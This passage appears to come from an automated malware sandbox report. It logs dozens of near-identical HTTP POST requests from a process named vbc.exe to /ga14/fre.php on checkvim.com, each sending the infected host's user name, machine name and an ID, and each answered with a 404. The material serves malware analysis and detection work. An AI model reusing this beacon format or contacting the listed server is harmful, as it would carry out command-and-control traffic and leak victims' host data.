                    Sep 28, 2021 06:50:48.285845995 CEST252OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:48.600373983 CEST252INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:59 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    25192.168.2.22491905.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:48.901348114 CEST253OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:48.978795052 CEST253OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:49.275072098 CEST254INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:00 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    26192.168.2.22491915.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:49.543982983 CEST255OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:49.607243061 CEST255OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:49.910859108 CEST255INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:01 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    27192.168.2.22491925.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:50.201147079 CEST256OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:50.273761988 CEST256OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:50.559416056 CEST257INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:01 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    28192.168.2.22491935.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:50.837245941 CEST257OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:50.910671949 CEST258OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:51.200424910 CEST258INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:02 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    29192.168.2.22491945.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:51.664554119 CEST259OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:51.732007027 CEST259OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:52.034302950 CEST259INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:03 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    3192.168.2.22491685.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:30.788969040 CEST223OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:30.866070986 CEST223OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:31.149317026 CEST223INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:42 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    30192.168.2.22491955.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:52.442626953 CEST260OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:52.513120890 CEST260OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:52.784749985 CEST261INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:04 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    31192.168.2.22491965.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:53.378968954 CEST261OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:53.447422981 CEST262OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:53.741503000 CEST262INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:05 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    32192.168.2.22491975.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:54.025804996 CEST263OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:54.101445913 CEST263OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:54.384705067 CEST263INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:05 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    33192.168.2.22491985.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:54.678868055 CEST264OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:54.742500067 CEST264OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:55.031650066 CEST265INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:06 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    34192.168.2.22491995.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:55.313486099 CEST266OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:55.387049913 CEST266OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:55.687469006 CEST266INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:07 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    35192.168.2.22492005.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:55.987133980 CEST267OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:56.053848028 CEST267OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:56.347594023 CEST268INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:07 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    36192.168.2.22492015.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:56.626189947 CEST268OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:56.694977999 CEST269OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:56.996386051 CEST269INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:08 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    37192.168.2.22492025.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:57.284758091 CEST270OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:57.353668928 CEST270OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:57.618108034 CEST270INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:08 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    38192.168.2.22492035.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:57.890671015 CEST271OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:57.958396912 CEST271OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:58.297914982 CEST272INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:09 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    39192.168.2.22492045.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:58.583041906 CEST273OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:58.648961067 CEST273OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:58.927284956 CEST273INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:10 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    4192.168.2.22491695.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:31.556288004 CEST224OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:31.624543905 CEST224OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:31.912451982 CEST225INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:43 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    40192.168.2.22492055.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:59.242790937 CEST274OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:59.320272923 CEST274OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:59.601229906 CEST275INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:10 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    41192.168.2.22492065.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:59.885917902 CEST275OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:59.952435970 CEST276OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:00.245923042 CEST276INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:11 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    42192.168.2.22492075.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:00.541294098 CEST277OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
